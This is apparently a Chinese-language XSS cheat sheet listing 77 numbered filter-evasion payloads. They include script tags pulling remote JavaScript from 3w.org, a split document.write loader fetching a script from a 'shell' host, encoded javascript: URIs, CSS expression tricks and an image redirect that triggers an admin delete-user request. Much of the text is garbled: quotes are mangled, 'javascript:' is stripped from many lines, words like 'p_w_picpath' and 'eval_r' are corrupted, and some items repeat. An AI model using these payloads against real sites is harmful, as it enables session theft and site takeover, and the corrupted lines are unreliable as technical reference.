xss***就是惡意***者往Web頁面裏插入惡意html代碼,當用戶瀏覽該頁之時,嵌入其中Web裏面的html代碼會被執行,從而達到惡意用戶的特殊目的。
(1)普通的XSS JavaScript注入
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2)IMG標籤XSS使用JavaScript命令
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3)IMG標籤無分號無引號
<IMG alert(‘XSS’)>
(4)IMG標籤大小寫不敏感
<IMG alert(‘XSS’)>
(5)HTML編碼(必須有分號)
<IMG alert(「XSS」)>
(6)修正缺陷IMG標籤
<IMG 「」"><SCRIPT>alert(「XSS」)</SCRIPT>」>
(7)formCharCode標籤(計算器)
<IMG alert(String.fromCharCode(88,83,83))>
(8)UTF-8的Unicode編碼(計算器)
<IMG jav..省略..S')>
(9)7位的UTF-8的Unicode編碼是沒有分號的(計算器)
<IMG jav..省略..S')>
(10)十六進制編碼也是沒有分號(計算器)
<IMG SRC=java..省略..XSS')>
(11)嵌入式標籤,將Javascript分開
<IMG SRC=」jav ascript:alert(‘XSS’);」>
(12)嵌入式編碼標籤,將Javascript分開
<IMG SRC=」jav ascript:alert(‘XSS’);」>
(13)嵌入式換行符
<IMG SRC=」jav ascript:alert(‘XSS’);」>
(14)嵌入式回車
<IMG SRC=」jav ascript:alert(‘XSS’);」>
(15)嵌入式多行注入JavaScript,這是XSS極端的例子
<IMG SRC=」alert(‘XSS‘)」>
(16)解決限制字符(要求同頁面)
<script>z=’document.’</script>
< script>z=z+’write(「‘</script>
< script>z=z+’<script’</script>
< script>z=z+’ src=ht’</script>
< script>z=z+’tp://ww’</script>
< script>z=z+’w.shell’</script>
< script>z=z+’.net/1.’</script>
< script>z=z+’js></sc’</script>
< script>z=z+’ript>」)’</script>
< script>eval_r(z)</script>
(17)空字符
perl -e ‘print 「<IMG java\0script:alert(\」XSS\」)>」;’ > out
(18)空字符2,空字符在國內基本沒效果.由於沒有地方能夠利用
perl -e ‘print 「<SCR\0IPT>alert(\」XSS\」)</SCR\0IPT>」;’ > out
(19)Spaces和meta前的IMG標籤
<IMG SRC=」 alert(‘XSS’);」>
(20)Non-alpha-non-digit XSS
< SCRIPT/XSS SRC=」
http://3w.org/XSS/xss.js」></SCRIPT>
(21)Non-alpha-non-digit XSS to 2
< BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(「XSS」)>
(22)Non-alpha-non-digit XSS to 3
< SCRIPT/SRC=」
http://3w.org/XSS/xss.js」></SCRIPT>
(23)雙開括號
<<SCRIPT>alert(「XSS」);//<</SCRIPT>
(24)無結束腳本標記(僅火狐等瀏覽器)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25)無結束腳本標記2
< SCRIPT SRC=//3w.org/XSS/xss.js>
(26)半開的HTML/JavaScript XSS
< IMG SRC=」alert(‘XSS’)」
(27)雙開角括號
<iframe src=http://3w.org/XSS.html <
(28)無單引號 雙引號 分號
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29)換碼過濾的JavaScript
\」;alert(‘XSS’);//
(30)結束Title標籤
< /TITLE><SCRIPT>alert(「XSS」);</SCRIPT>
(31)Input Image
< INPUT SRC=」alert(‘XSS’);」>
(32)BODY Image
< BODY BACKGROUND=」alert(‘XSS’)」>
(33)BODY標籤
<BODY(‘XSS’)>
(34)IMG Dynsrc
< IMG DYNSRC=」alert(‘XSS’)」>
(35)IMG Lowsrc
< IMG LOWSRC=」alert(‘XSS’)」>
(36)BGSOUND
< BGSOUND SRC=」alert(‘XSS’);」>
(37)STYLE sheet
< LINK REL=」stylesheet」 HREF=」alert(‘XSS’);」>
(38)遠程樣式表
<LINK REL=」stylesheet」 HREF=」
http://3w.org/xss.css」>
(39)List-style-p_w_picpath(列表式)
<STYLE>li {list-style-p_w_picpath: url(「alert(‘XSS’)」);}< /STYLE><UL><LI>XSS
(40)IMG VBscript
< IMG SRC=’vbscript:msgbox(「XSS」)’></STYLE><UL><LI>XSS
(41)META連接url
< META HTTP-EQUIV=」refresh」 CONTENT=」0; URL=http://;URL=alert(‘XSS’);」>
(42)Iframe
< IFRAME SRC=」alert(‘XSS’);」>< /IFRAME>
(43)Frame
< FRAMESET><FRAME SRC=」alert(‘XSS’);」>< /FRAMESET>
(44)Table
< TABLE BACKGROUND=」alert(‘XSS’)」>
(45)TD
< TABLE><TD BACKGROUND=」alert(‘XSS’)」>
(46)DIV background-p_w_picpath
< DIV STYLE=」background-p_w_picpath: url(alert(‘XSS’))」>
(47)DIV background-p_w_picpath後加上額外字符(1-32&34&39&160&8192-8&13&12288&65279)
< DIV STYLE=」background-p_w_picpath: url( alert(‘XSS’))」>
(48)DIV expression
< DIV STYLE=」width: expression_r(alert(‘XSS’));」>
(49)STYLE屬性分拆表達
<IMG STYLE=」xss:expression_r(alert(‘XSS’))」>
(50)匿名STYLE(組成:開角號和一個字母開頭)
<XSS STYLE=」xss:expression_r(alert(‘XSS’))」>
(51)STYLE background-p_w_picpath
< STYLE>.XSS{background-p_w_picpath:url(「alert(‘XSS’)」);}< /STYLE><A CLASS=XSS></A>
(52)IMG STYLE方式
exppression(alert(「XSS」))’>
(53)STYLE background
< STYLE><STYLE type=」text/css」>BODY{url(「alert(‘XSS’)」)}< /STYLE>
(54)BASE
< BASE HREF=」alert(‘XSS’); //」>
(55)EMBED標籤,你能夠嵌入FLASH,其中包涵XSS
< EMBED SRC=」
http://3w.org/XSS/xss.swf」 ></EMBED>
(56)在flash中使用ActionScrpt能夠混進你XSS的代碼
a=」get」;
b=」URL(\」";
c=」javascript:」;
d=」alert(‘XSS’);\」)」;
eval_r(a+b+c+d);
(57)XML namespace.HTC文件必須和你的XSS載體在一臺服務器上
<HTML xmlns:xss>
< ?import namespace=」xss」 implementation=」
http://3w.org/XSS/xss.htc」>
<xss:xss>XSS</xss:xss>
< /HTML>
(58)若是過濾了你的JS你能夠在圖片裏添加JS代碼來利用
<SCRIPT SRC=」」></SCRIPT>
(59)IMG嵌入式命令,可執行任意命令
<IMG SRC=」
http://www.XXX.com/a.php?a=b」>
(60)IMG嵌入式命令(a.jpg在同服務器)
Redirect 302 /a.jpg
http://www.XXX.com/admin.asp&deleteuser
(61)繞符號過濾
<SCRIPT a=」>」 SRC=」
http://3w.org/xss.js」></SCRIPT>
(62)
< SCRIPT =」>」 SRC=」
http://3w.org/xss.js」></SCRIPT>
(63)
< SCRIPT a=」>」 」 SRC=」
http://3w.org/xss.js」></SCRIPT>
(64)
< SCRIPT 「a=’>’」 SRC=」
http://3w.org/xss.js」></SCRIPT>
(65)
< SCRIPT a=`>` SRC=」
http://3w.org/xss.js」></SCRIPT>
(66)
< SCRIPT a=」>’>」 SRC=」
http://3w.org/xss.js」></SCRIPT>
(67)
< SCRIPT>document.write(「<SCRI」);</SCRIPT>PT SRC=」
http://3w.org/xss.js」></SCRIPT>
(68)URL繞行
<A HREF=」
http://127.0.0.1/」>XSS</A>
(69)URL編碼
<A HREF=」
http://3w.org」>XSS</A>
(70)IP十進制
<A HREF=」http://3232235521″>XSS</A>
(71)IP十六進制
<A HREF=」
http://0xc0.0xa8.0×00.0×01″>XSS</A>
(72)IP八進制
<A HREF=」
http://0300.0250.0000.0001″>XSS</A>
(73)混合編碼
<A HREF=」h
tt p://6 6.000146.0×7.147/」">XSS</A>
(74)節省[http:]
< A HREF=」//www.google.com/」>XSS</A>
(75)節省[www]
< A HREF=」
http://google.com/」>XSS</A>
(76)絕對點絕對DNS
< A HREF=」
http://www.google.com./」>XSS</A>
(77)javascript連接
<A HREF=」javascript:document.location=’
http://www.google.com/’」>XSS</A>